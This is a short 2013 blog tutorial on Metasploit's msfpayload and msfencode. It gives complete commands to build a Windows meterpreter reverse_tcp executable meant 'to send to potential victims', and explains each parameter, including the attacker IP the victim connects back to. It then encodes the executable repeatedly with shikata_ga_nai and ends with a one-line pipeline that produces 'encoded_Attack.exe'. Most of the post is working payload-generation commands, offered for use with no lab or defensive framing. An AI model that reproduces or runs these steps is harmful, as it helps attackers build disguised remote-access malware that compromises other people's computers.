Tuesday, 4 June 2013


"msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module." - http://www.offensive-security.com


Open the terminal and type in #msfpayload -l to see all the available payloads in the MSF framework.

To view the information of a specific payload, do a
#msfpayload windows/meterpreter/reverse_tcp O

To create a payload (which will result and executable for us to send to potential victims), do 
#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R > /root/Desktop/Safekeep/reverse_tcp.exe

-) msfpayload (the tool)
-) windows/meterpreter/reverse_tcp (the payload)
-) LHOST= (the attacker machine IP, where you want the victim to connect to)
-) LPORT=443 (the port to connect to)
-) R (Raw format)
-) > (Output to)
-) /root/Desktop/Safekeep/reverse_tcp.exe (location/path)


"msfencode is another great little tool in the framework's arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for 64 bit target."- http://www.offensive-security.com

Open the terminal and type in #msfencode -h to see the options.

To see all the possible encode methods, type #msfencode -l

Now lets encode the payload that we generated just now using msfpayload. 
#msfencode -i /root/Desktop/Safekeep/reverse_tcp.exe -o /root/Desktop/Safekeep/encoded_reverse_tcp.exe -e x86/shikata_ga_nai -c 10 -t exe

Using MSFPAYLOAD and MSFENCODE together!

To do this, you dont have to perform the steps above as the command below will do both at a single command.

#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t exe -o /root/Desktop/Safekeep/encoded_Attack.exe

No comments:

Post a Comment